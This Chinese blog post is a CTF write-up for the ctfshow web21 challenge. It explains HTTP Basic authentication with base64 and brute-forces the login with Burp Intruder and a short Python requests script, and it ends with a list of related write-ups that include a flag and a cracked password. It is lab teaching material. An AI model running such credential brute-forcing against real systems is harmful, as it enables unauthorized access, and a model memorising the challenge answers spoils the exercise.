[ctfshow web入门] web21

已于 2025-04-08 11:44:22 修改
阅读量332 收藏 4
点赞数 5
分类专栏: ctfshow web入门 文章标签: web安全 网络安全
于 2025-04-08 10:41:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_50332504/article/details/147060902
版权

前置知识

Base64编码使用了64个字符来表示二进制数据,包括A-Za-z0-9+/,末尾有0-2个=进行填充,所以只要看到密文末尾有一两个=,再检查密文本身是否由上述符号组成,就能大概判断密文是否为base64编码了

信息收集

在这里插入图片描述
一个对话框,输入123 321抓个包看看
在这里插入图片描述

在这里插入图片描述

暴力破解

burpsuite

把抓到的包发送到intruder,添加payload,并在payload前写上admin:的base64编码YWRtaW46
下载题目给的字典,如果不下字典很可能很难爆出来,可见好的字典非常重要。
在这里插入图片描述
攻击结束,按照状态码排序,或者按照长度排序,找出不同的那个进行查看
在这里插入图片描述

python解法

即使不学习burpsuite的intruder也可以使用代码完成这些操作,这并不会太复杂

import requests
import base64

def encode_base64(string):
    return base64.b64encode(string.encode('utf-8')).decode('utf-8')

def burte_force_pwd(url, dir_path):
    username = encode_base64("admin:")
    with open(dir_path, "r") as file:
        for line in file:
            password = encode_base64(line[:-1])
            header_Authorization = {"Authorization": f"Basic {username + password}"}
            respond = requests.get(url, headers=header_Authorization)

            if respond.status_code == 200:
                print(respond.text)
                break

if __name__ == '__main__':
    url = "http://0fbd3ed8-d357-4053-868e-004bb23f1722.challenge.ctf.show/"
    dir_path = "D:\\_burpsuite\\最新网站后台密码破解字典.txt"
    burte_force_pwd(url, dir_path)

没有web22,这一题因域名变更被废弃了
web20    目录    web23

ctfshow web入门 web87
2401_83272517的博客
05-25 1241
入门2年半还没有入门的菜坤的日常wp
ctfshow web入门--爆破
2402_87078084的博客
02-22 178
随便输入账号密码进行登录,抓了半天都没有抓到有用户名和密码的包,最后还是用的bp的内嵌浏览器才抓到。然后进行爆破,这里我们采用 Custom iterator进行爆破,具体操作可参考。疑似base64编码,所以解码试试看,发现是我们输入的账号密码,并且是。点击连接进去就是登录页面,但并没有给账号密码,所以直接抓包看一下。我们再使用爆破成功的账号密码,就能得到flag。提示中给了一个压缩包,下载后发现是一个字典。状态码为200即为爆破成功。
ctfshow-web入门-爆破(21
2301_80281749的博客
10-25 244
payload type选择custom iterator,payload options依次添加admin、:、123456(这个是根据每个人的输入情况而定的),payload processing选择base64编码,将payload encoding取消掉。我们回到登录界面,就得到了flag:ctfshow{b6c93ec8-1d34-4d51-a77f-4e307e259340}在选择长度不一样的,我们把它进行base64解码,得到账号和密码:admin,shark63。需要进行base64编码;
CTFshowweb21
qq_51324662的博客
05-11 696
关于CTFshowweb21题 这道题普遍的写法是用BURP suite抓包工具写的: 但是,身为一个代学生怎么会满足于抓包工具呢,于是,神奇的zzuctfer想到了自己可以用requests模块写一个脚本来处理这个暴力破解的方法: 1.首先用神奇的抓包工具抓一下包 #第一次笔者以为这个是用POST请求提交的表单,但是,通过反复的抓包,我发现了一个变量 Authorization这一栏,这个神奇的请求头的内容会变,并且大致观察一下发现它是base64编码的这时候,解码一下发现了这个结果: admin:
CTFshow web21-web28 做题笔记
m0_73981089的博客
03-17 509
在修改编码方式,可以查看原来的抓包会把我们所发的用户名 :密码base64编码。我们先抓包,把表格上的信息输进去,由于我们不知道身份证,所以我们选择。域名失效了,扩展域名,搜索域名可以在鹰图、fofa上进行信息收集。平常查看源代码等步骤不行,但是发现了这个两个目录,会不会二进制🤔。点击录取名单,下载一个表格,再点击查询系统,突破口就来了。/6/1/,也是这种情况,所以能猜到大概是目录。而题目只给了我们后台密码的字典,所以我们。,找到最长或者最短的响应包,拿到flag。用户名,没有提示,习惯用admin。
CTFshow爆破之web21
potatojiang的博客
07-23 240
从今天7.23开始学习爆破。
CTFSHOW web入门——web21
m0_74093152的博客
02-21 355
CTFSHOWweb入门——web21
CTFshow 爆破 web21
Kradress的博客
10-28 279
根据提示 爆破什么的,都是基操 进去弹出表单,要求输入账号密码 通过bp抓包得到,发现Authorization 后面的是base64加密的字段 解密得到 用户名:密码 对admin:进行加密 用bp把请求数据包发送到Intruder模块,构造payload(第一个$前面的是admin:的base64加密) 加载题目给的字典(zip文件重命名1.zip,可以得到字典的txt文件),然后添加规则,将payload进行base64加密,并且把下方的url加密的勾去掉,开始爆破 由于题库对请求速度做
ctfshow web入门 nodejs334-338
2301_80548709的博客
04-27 896
这题入门题,下载附件以.zip的格式打开,拿到源代码,进行代码审计,发现,按照他的逻辑.输入正确的用户名及密码即可登录,这里需要注意的是,对于这个代码的逻辑,是你输入的用户名是不能等于CTFSHOW的,所以我们输入他的小写即可,因为它后面有toUppercase()函数,会将我们输入的大写,所以不用管.js大小写特性参考。
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1290
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
ctfshow web入门 爆破web25详解
m0_73860001的博客
07-11 1177
这里说一下为什么这样做,因为如果我直接打开终端,接着输入【tar -zxvf php_mt_seed-4.0.tar.gz】的话我这台虚拟机上会报错,但我对这个虚拟机不熟悉,去找了一些资料有以为博主是输入了绝对路径解决这个报错的,【tar -zxvf 绝对路径】,我懒得去找绝对路径就有感而发从那里试了试,没想到成功了。4.随后【下载】那里会出现一个【php_mt_seed-4.0】的文件夹,右键出现菜单点击【从这里打开终端】这里我是在【./php_mt_seed 2078517280】加了一个.c,
ctfshow爆破web21
m0_62584974的博客
04-04 699
Web21爆破什么的,都是基操考察自定义迭代器 输入值后用bp抓包发送到测试器 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了 记得 取消url编码 ...
CTF-论剑场 web21
qq_45826388的博客
08-26 285
web21 右键查看源代码 这里利用php://input 给$user传值,然后利用下面include()函数包含class.php php://filter/read=convert.base64-encode/resource=class.php 将class.php的源码转换为base64编码; 没读出来抓包看一下
CTFSHOW爆破 WEB21~WEB28
y4615184的博客
05-13 548
温故知新,复盘当尝试不同方法,弄懂原理! WEB 21 直接一个登录界面,开BP,先输入admin/123456 ,抓包 发现GET包中的Authorization(授权)中有一段密文 ,像base64编码,试下解密 发现这里就是提交的账号密码,中间有个:,知道了格式和提交位置,开始爆破 先改为明文形式加变量符,选择cluster bomb模式,载入提供的字典,添加两条规则(末尾固定增加:,base64编码),取消payload encoding的√(避免特殊符号被自动转义).
ctfshow-web入门21-28)
1ance's blog
06-01 617
爆破web21web22web23web24web25web26web27web28 web21 web22 web23 web24 web25 源码: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 13:56:57 # @Last Modified by: h1xa # @Last Modified time: 2020-09-03 15:47:33 # @email: h1xa@ctfer.com
ctfshow-web爆破(web21-28)
m0_50268414的博客
11-29 1439
ctfshow-web爆破(web21-28)(updating) 文章目录ctfshow-web爆破(web21-28)(updating)web21 burp爆破web22 子域名web23 MD5web24 伪随机数web25 php mtrand()随机数生成漏洞web26 抓包web27 学生信息泄露+身份证号爆破web28 目录爆破 web21 burp爆破 题目 爆破什么的,都是基操 解 跟爆破相关,直接使用burp,因为win上的burp突然挂了,只能用kali上的先用一波,打开抓包,提
ctfshow 爆破 web21-web28
YkingH的博客
01-29 2551
爆破 爆破考察手段 burp intruder的使用 编写脚本寻找满足条件的解 伪随机 web21 burp抓包,发送到intruder模块,利用题中给出的脚本进行爆破,注意通过payload加工模块进行payload加工,采用base64编码。在返回的数据包中查找长度即可 web22 环境进不去,直接提交flag web23 利用给出的php脚本,进行进一步加工,爆破出满足条件的token <?php for($a=0;$a<10;$a++){ for($b=0;$b<10;$b
ctfshow-web入门-爆破(web21-web24)
Welcome To Myon'Blog !
06-02 2271
(intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1) === intval(substr($token, 31,1)) 将第 2、15 和 18 个字符转换为整数相加,再除以第 2 个字符的整数值,检查结果是否等于第 32 个字符的整数值;flag.ctf.show 页面无法访问(前面有一个查这个域名的 DNS 的 TXT信息的题也是有问题)
CTFshowweb入门21-28(爆破)
一个普普通通的博客
10-15 4147
文章目录WEB21WEB22WEB23WEB24WEB25WEB26WEB27WEB28 WEB21 先随意使用一个密码抓包尝试一下 base64解密后发现账号密码的形式为 账号:密码 根据提示我们使用题目所给字典爆破 构造payload,猜测账户名为admin,前半部分不用变,为后半部分迭代即可 导入所给字典 进行base64编码,切记不可为符号再编码,base64可能存在= attack 拿到flag 或者采用方式二 同样拿下 WEB22 子域名爆破,但是这题爆不出来,直接查看view
ctfshow web入门 web35
最新发布
03-29
### CTFShow Web 入门 Web35 的解题思路 CTFShow 平台中的 Web 类别题目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值